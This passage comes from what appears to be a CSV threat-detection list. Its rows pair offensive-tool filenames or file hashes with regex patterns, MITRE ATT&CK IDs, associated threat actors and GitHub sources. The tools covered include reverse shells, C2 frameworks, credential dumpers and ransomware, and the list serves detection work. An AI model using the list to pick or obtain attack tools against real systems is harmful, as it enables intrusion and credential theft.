tool","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","8","10","2299","316","2024-09-22T22:40:38Z","2017-02-04T01:03:39Z","42520" "*eapmd5tojohn*",".{0,1000}eapmd5tojohn.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","42521" "*earching for systems where privileged users' credentials might be in running memory*",".{0,1000}earching\sfor\ssystems\swhere\sprivileged\susers\'\scredentials\smight\sbe\sin\srunning\smemory.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","42522" "*EarlyBird_Injection.py*",".{0,1000}EarlyBird_Injection\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","42523" "*easinvoker.exe*System32*",".{0,1000}easinvoker\.exe.{0,1000}System32.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","42524" "*easside-ng -* -s 127.0.0.1*",".{0,1000}easside\-ng\s\-.{0,1000}\s\-s\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","42525" "*EasyHook-Managed*InjectionLoader.cs*",".{0,1000}EasyHook\-Managed.{0,1000}InjectionLoader\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","42528" "*EasyHook-Managed*WOW64Bypass.*",".{0,1000}EasyHook\-Managed.{0,1000}WOW64Bypass\..{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","42529" "*EasyHook-Managed/LocalHook.cs*",".{0,1000}EasyHook\-Managed\/LocalHook\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - 
TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","42530" "*EasyPersistent.cna*",".{0,1000}EasyPersistent\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","42531" 
"*eb046b68a014aded4f81bb952edadd283a0cd5a36fc416b89d391df3daaa6d9e*",".{0,1000}eb046b68a014aded4f81bb952edadd283a0cd5a36fc416b89d391df3daaa6d9e.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","42532" "*eb0beca1758174ab255d6a183dc645005249a70c3c77db9e9eb2b24551f21114*",".{0,1000}eb0beca1758174ab255d6a183dc645005249a70c3c77db9e9eb2b24551f21114.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42534" "*eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e*",".{0,1000}eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42536" "*eb203a19993c7f3e6e02e0af12473fb59210b6699debf70c9492cd4b4335750a*",".{0,1000}eb203a19993c7f3e6e02e0af12473fb59210b6699debf70c9492cd4b4335750a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42539" "*eb20a48a7db56cd444d98b7990156213272258a9b80e8f2c6a84be64f2179763*",".{0,1000}eb20a48a7db56cd444d98b7990156213272258a9b80e8f2c6a84be64f2179763.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42540" "*eb2bcc1bc9b6802b3869f6343b0fcbe72f3d1642abbc34e0758122e6510c2f4a*",".{0,1000}eb2bcc1bc9b6802b3869f6343b0fcbe72f3d1642abbc34e0758122e6510c2f4a.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","42543" 
"*eb3942820fe42a74498278ea17038712f1aad0e37d2ff939b71d55cfe3bf262f*",".{0,1000}eb3942820fe42a74498278ea17038712f1aad0e37d2ff939b71d55cfe3bf262f.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42544" "*eb5711643823d2be13eb499c8c955c09451fc3efc9d259ff0644d17115be8cd6*",".{0,1000}eb5711643823d2be13eb499c8c955c09451fc3efc9d259ff0644d17115be8cd6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42547" "*eb5fee1e402f321c8e705776faf2be7bbede5d2a24fe3ac40be082a75429f927*",".{0,1000}eb5fee1e402f321c8e705776faf2be7bbede5d2a24fe3ac40be082a75429f927.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#filehash #linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","42549" "*eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a*",".{0,1000}eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42551" "*eb66eddca2e0c2a6b40ab6be4a159be5c81ee9f1dd3b7cc42df7c017ae06ee45*",".{0,1000}eb66eddca2e0c2a6b40ab6be4a159be5c81ee9f1dd3b7cc42df7c017ae06ee45.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","42552" "*eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967*",".{0,1000}eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","42553" "*eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02*",".{0,1000}eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#filehash","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","42557" "*eb86b2983951110f0f06547f3a965f6f0ae9d07b452aa14d23265c73334e1df5*",".{0,1000}eb86b2983951110f0f06547f3a965f6f0ae9d07b452aa14d23265c73334e1df5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42558" "*eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0*",".{0,1000}eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","42559" "*eb901b02b7f7173e62a962b9d5d66b52ed9b47fcb8061165a1b2bcf2a5e5504d*",".{0,1000}eb901b02b7f7173e62a962b9d5d66b52ed9b47fcb8061165a1b2bcf2a5e5504d.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42563" "*eb93d18ebddbcc79c037708558cbf1295b85a75230ba1690f07d287433d48fd1*",".{0,1000}eb93d18ebddbcc79c037708558cbf1295b85a75230ba1690f07d287433d48fd1.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42566" "*eb9c1a8804daed7c8ace37adc87ac66b52e7363666e5af7912bb17695df9b4f4*",".{0,1000}eb9c1a8804daed7c8ace37adc87ac66b52e7363666e5af7912bb17695df9b4f4.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","42568" "*eb9da00ffbeda04154547d05a2c6ffb7131b75762b8239a8095b0915bf810e60*",".{0,1000}eb9da00ffbeda04154547d05a2c6ffb7131b75762b8239a8095b0915bf810e60.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42569" "*eb9df7d669dcabf93689b82371cc913efa490d3912da2101c5f4660f9edbcf7f*",".{0,1000}eb9df7d669dcabf93689b82371cc913efa490d3912da2101c5f4660f9edbcf7f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42570" "*eba551ef10f31815b3fcf90ed71df40aa0ed7e4aae4aca05eaef47efd4609e4c*",".{0,1000}eba551ef10f31815b3fcf90ed71df40aa0ed7e4aae4aca05eaef47efd4609e4c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42571" "*eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402*",".{0,1000}eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR 
- Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42572" "*eba9447c8ef7248fd7f1a14a7ca34b66fc21f090dc6b30873c54acb418afe13d*",".{0,1000}eba9447c8ef7248fd7f1a14a7ca34b66fc21f090dc6b30873c54acb418afe13d.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42573" "*ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919*",".{0,1000}ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","42574" "*ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438*",".{0,1000}ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42575" "*ebab9ec84e1edfc7799a553765e92babbbdbe685949c81ba040889a2f6cbee77*",".{0,1000}ebab9ec84e1edfc7799a553765e92babbbdbe685949c81ba040889a2f6cbee77.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42576" "*ebac84e6e59f9bb6093f2aabef5c9568c27ab1f922d3124c9e8f9675de150059*",".{0,1000}ebac84e6e59f9bb6093f2aabef5c9568c27ab1f922d3124c9e8f9675de150059.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42577" "*ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc*",".{0,1000}ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","42579" "*ebb3a940c6d104730532897e9e753cbeead3ad059186e15dab4f403d6ff0acf5*",".{0,1000}ebb3a940c6d104730532897e9e753cbeead3ad059186e15dab4f403d6ff0acf5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42580" "*ebbfc954a86165453676f0671b5b4d24d58425c65245511ca04dbcd799934e77*",".{0,1000}ebbfc954a86165453676f0671b5b4d24d58425c65245511ca04dbcd799934e77.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42581" "*ebc3a8b952bb617b89cf6f807c4e60e23978608dcaa75e381406bd85de984481*",".{0,1000}ebc3a8b952bb617b89cf6f807c4e60e23978608dcaa75e381406bd85de984481.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","42583" "*ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414*",".{0,1000}ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","42584" "*ebd36ece57ad0fefe730705480742620c4d189aa6a3d3a00d46504d1bd9741c9*",".{0,1000}ebd36ece57ad0fefe730705480742620c4d189aa6a3d3a00d46504d1bd9741c9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42585" "*ebd8cbb85e4108ec6a13c3b25c839ac3d0ad4c0a07bf76e3f882daaf63e09fc9*",".{0,1000}ebd8cbb85e4108ec6a13c3b25c839ac3d0ad4c0a07bf76e3f882daaf63e09fc9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42586" "*ebdac49d15f37cc60cb5e755b10743512ececf134126e0ac4a024cb1149ae76f*",".{0,1000}ebdac49d15f37cc60cb5e755b10743512ececf134126e0ac4a024cb1149ae76f.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#filehash","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","42587" "*ebde1952b0cd01f7fd6534da9cd878040cc6b21c992be602f83ade3bfe6b404d*",".{0,1000}ebde1952b0cd01f7fd6534da9cd878040cc6b21c992be602f83ade3bfe6b404d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42588" "*ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892*",".{0,1000}ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 